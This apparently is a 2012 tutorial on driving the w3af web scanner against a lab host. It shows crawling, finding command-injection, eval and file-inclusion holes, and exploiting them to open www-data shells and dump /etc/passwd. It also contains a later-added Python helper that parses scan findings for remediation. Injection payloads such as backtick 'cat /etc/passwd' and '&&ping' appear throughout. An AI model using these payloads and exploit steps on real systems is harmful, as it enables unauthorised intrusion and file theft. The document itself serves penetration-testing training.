W3AF: multiple URLs
Posted 2012-11-10 20:22:13
By default only a single page is scanned, e.g.:

```
w3af/plugins>>> audit osCommanding
w3af/plugins>>> audit eval
w3af/config:target>>> set target http://5.5.5.3/pen/share/info.php?arg=phpinfo%28%29;
w3af/config:target>>> back
w3af>>> start
Found 1 URLs and 1 different points of injection.
The list of URLs is:
- http://5.5.5.3/pen/share/info.php
The list of fuzzable requests is:
- http://5.5.5.3/pen/share/info.php | Method: GET | Parameters: (arg="phpinfo()")
OS Commanding was found at: "http://5.5.5.3/pen/share/info.php", using HTTP method GET. The sent data was: "arg=%60%2Fbin%2Fcat%20%2Fetc%2Fpasswd%60". This vulnerability was found in the request with id 24.
eval() input injection was found at: "http://5.5.5.3/pen/share/info.php", using HTTP method GET. The sent data was: "arg=phpinfo%28%29". This vulnerability was found in the requests with ids 34, 38, 42 and 46.
Scan finished in 11 seconds.
```


To cover more than one URL you need to enable the crawler (spider):

```
w3af/plugins>>> discovery webSpider
```


The newer version errors out, though. Install it with apt-get instead:

```
apt-get install w3af w3af_console
```

Don't use the copy under /opt.

Go into /usr/bin:

```
cp python2.7 python2.5
```

Run a crawling scan. Start the console by typing w3af_console directly:

```
w3af/plugins>>> discovery webSpider    # start the crawler
w3af/plugins>>> audit sqli blindSqli
w3af/plugins>>> output textFile        # log to a text file
w3af/config:target>>> set target http://www.webscantest.com/
w3af/config:target>>> back
w3af>>> start
```

It will then crawl the site, scan every link it finds, and write the report under /usr/share/w3af/.

```
root@Dis9Team:~# w3af_console -i /pen/msf3/
w3af>>> plugins discovery allowedMethods webSpider
w3af>>> target set target http://5.5.5.3/pen/
w3af>>> start
w3af>>> target set target http://5.5.5.3/pen/file.php?cat=about.txt
w3af>>> plugins audit localFileInclude
w3af>>> start
Local File Inclusion was found at: "http://5.5.5.3/pen/file.php", using HTTP method GET. The sent data was: "cat=/etc/passwd". This vulnerability was found in the request with id 373.
Finished scanning process.
```

Vulnerabilities found include:

```
w3af>>> target set target http://5.5.5.3/pen/share/index.php?ls=test
w3af>>> plugins audit osCommanding
w3af>>> start
OS Commanding was found at: "http://5.5.5.3/pen/share/index.php", using HTTP method GET. The sent data was: "ls=%26%26ping+-c+9+localhost". This vulnerability was found in the request with id 809.
Local File Inclusion was found at: "http://5.5.5.3/pen/file.php", using HTTP method GET. The sent data was: "cat=/etc/passwd". This vulnerability was found in the request with id 373.
```

Command execution:

```
OS Commanding was found at: "http://5.5.5.3/pen/share/index.php", using HTTP method GET. The sent data was: "ls=%26%26ping+-c+9+localhost". This vulnerability was found in the request with id 809.
```
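Triage helper, added here and not part of the original post or of w3af itself: it parses the one-line finding messages w3af prints (format as shown in the output above) into structured records and collapses repeats, so a hole reported under several request ids, or again in a second run, is tracked once for remediation and re-test. The sample report is constructed from the finding lines quoted in this post plus one non-finding line.

```python
import re
from urllib.parse import unquote_plus

# One finding per line, as w3af prints it (format taken from the post), e.g.
#   OS Commanding was found at: "<url>", using HTTP method GET. The sent data was: "<param=value>". This vulnerability was found in the request with id N.
FINDING_RE = re.compile(
    r'^(?P<vuln>.+?) was found at: "(?P<url>[^"]+)", using HTTP method (?P<method>[A-Z]+)\. '
    r'The sent data was: "(?P<data>[^"]*)"\. '
    r'This vulnerability was found in the requests? with ids? (?P<ids>[\d, and]+)\.$'
)

# Constructed sample: the finding lines quoted in the post (the LFI line twice,
# as it appeared in two runs) plus one line that is not a finding.
SAMPLE_REPORT = """\
OS Commanding was found at: "http://5.5.5.3/pen/share/info.php", using HTTP method GET. The sent data was: "arg=%60%2Fbin%2Fcat%20%2Fetc%2Fpasswd%60". This vulnerability was found in the request with id 24.
eval() input injection was found at: "http://5.5.5.3/pen/share/info.php", using HTTP method GET. The sent data was: "arg=phpinfo%28%29". This vulnerability was found in the requests with ids 34, 38, 42 and 46.
Local File Inclusion was found at: "http://5.5.5.3/pen/file.php", using HTTP method GET. The sent data was: "cat=/etc/passwd". This vulnerability was found in the request with id 373.
OS Commanding was found at: "http://5.5.5.3/pen/share/index.php", using HTTP method GET. The sent data was: "ls=%26%26ping+-c+9+localhost". This vulnerability was found in the request with id 809.
Local File Inclusion was found at: "http://5.5.5.3/pen/file.php", using HTTP method GET. The sent data was: "cat=/etc/passwd". This vulnerability was found in the request with id 373.
Scan finished in 11 seconds.
"""

def parse_findings(report):
    """Return one dict per finding line; non-finding lines are skipped."""
    findings = []
    for line in report.splitlines():
        m = FINDING_RE.match(line.strip())
        if not m:
            continue
        param, _, raw_value = m.group("data").partition("=")
        findings.append({
            "vuln": m.group("vuln"),
            "url": m.group("url"),
            "method": m.group("method"),
            "param": param,
            "payload": unquote_plus(raw_value),  # undo the %XX / '+' encoding w3af used
            "request_ids": [int(i) for i in re.findall(r"\d+", m.group("ids"))],
        })
    return findings

def dedupe_findings(findings):
    """Merge hits on the same (vuln, url, param); request ids are unioned and sorted."""
    merged = {}
    for f in findings:
        key = (f["vuln"], f["url"], f["param"])
        entry = merged.setdefault(key, {**f, "request_ids": set()})
        entry["request_ids"].update(f["request_ids"])
    for entry in merged.values():
        entry["request_ids"] = sorted(entry["request_ids"])
    return merged
```

Feed it the textFile plugin's log (or a pasted console transcript) and the merged dict gives one entry per distinct injection point, each with every request id that hit it.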

Exploitation:

```
w3af>>> exploit
w3af/exploit>>> exploit
Exploit a vulnerability found by audit plugins.
Sintax: exploit {plugin [vulnerability-id] | * [stopOnFirst]}
When using "exploit *" you will be running all exploit plugins, ordered by the probability of getting a root shell. When you add the "stopOnFirst" option to the "exploit *" command, you are making w3af stop on the first successbody exploit.
Examples:
- exploit *
- exploit osCommanding
- exploit osCommanding 5
w3af/exploit>>> exploit osCommanding
Unknown plugin. Use the list command to view available plugins.
w3af/exploit>>> exploit osCommandingShell
osCommandingShell exploit plugin is starting.
The vulnerability was found using method GET, tried to change the method to POST for exploiting but failed.
Vulnerability successfully exploited. This is a list of available shells and proxies:
- [0] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
Please use the interact command to interact with the shell objects.
w3af/exploit>>>
```

That gives shell [0]. Now the inclusion vulnerability:

```
w3af/exploit>>> exploit localFileReader
localFileReader exploit plugin is starting.
The vulnerability was found using method GET, tried to change the method to POST for exploiting but failed.
Vulnerability successfully exploited. This is a list of available shells and proxies:
- [0] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
- [1] <shell object (rsystem: "linux")>
Please use the interact command to interact with the shell objects.
w3af/exploit>>>
```

Connect:

```
w3af/exploit>>> interact
This is a list of available shells and proxies:
- [0] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
- [1] <shell object (rsystem: "linux")>
```

Two sessions:

```
w3af/exploit>>> interact 0
Execute "endInteraction" to get out of the remote shell. Commands typed in this menu will be runned through the osCommandingShell shell
w3af/exploit/osCommandingShell-0>>> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
w3af/exploit/osCommandingShell-0>>> ls
index.php
info.php
w3af/exploit/osCommandingShell-0>>> endInteraction
```

The other one:

```
w3af/exploit>>> interact
This is a list of available shells and proxies:
- [0] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
- [1] <shell object (rsystem: "linux")>
w3af/exploit>>> interact 1
w3af/exploit/localFileReader-1>>> cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
avahi-autoipd:x:103:108:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:104:109:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
usbmux:x:105:46:usbmux daemon,,,:/home/usbmux:/bin/false
gdm:x:106:114:Gnome Display Manager:/var/lib/gdm:/bin/false
speech-dispatcher:x:107:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
kernoops:x:108:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:109:116:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:110:119:RealtimeKit,,,:/proc:/bin/false
hplip:x:111:7:HPLIP system user,,,:/var/run/hplip:/bin/false
saned:x:112:121::/home/saned:/bin/false
brk:x:1000:1000:Dis9Team,,,:/home/brk:/bin/bash
postgres:x:113:123:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
smmta:x:114:124:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:115:125:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
sshd:x:116:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:1001:110::/home/mysql:/bin/false
kippo:x:1002:1002::/home/kippo:/bin/bash
honeyd:x:117:115:Honeyd daemon,,,:/var/log/honeypot:/bin/false
a:x:1003:33::/dev/null:/usr/sbin/nologin
b:x:1004:33::/dev/null:/usr/sbin/nologin
w3af/exploit/localFileReader-1>>>
w3af/exploit/localFileReader-1>>> endInteraction
```

All audit plugins:

```
w3af>>> plugins audit all
w3af>>> target set target http://5.5.5.3/pen/
w3af>>> start
```

Exploit every finding:

```
w3af>>> exploit exploit *
Please use the interact command to interact with the shell objects.
w3af>>> exploit interact
This is a list of available shells and proxies:
- [0] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
- [1] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
- [2] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
- [3] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
- [4] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
- [5] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
- [6] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
- [7] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
- [8] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
- [9] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
- [10] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
- [11] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
- [12] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
- [13] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
- [14] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
- [15] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
- [16] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
- [17] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
- [18] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
- [19] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
- [20] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
- [21] <shell object (rsystem: "linux")>
- [22] <shell object (rsystem: "linux")>
- [23] <shell object (rsystem: "linux")>
- [24] <shell object (rsystem: "linux")>
- [25] <shell object (rsystem: "linux")>
- [26] <shell object (rsystem: "linux")>
w3af>>>
```

Connect to one of them by its ID:

```
w3af>>> exploit interact ID
```



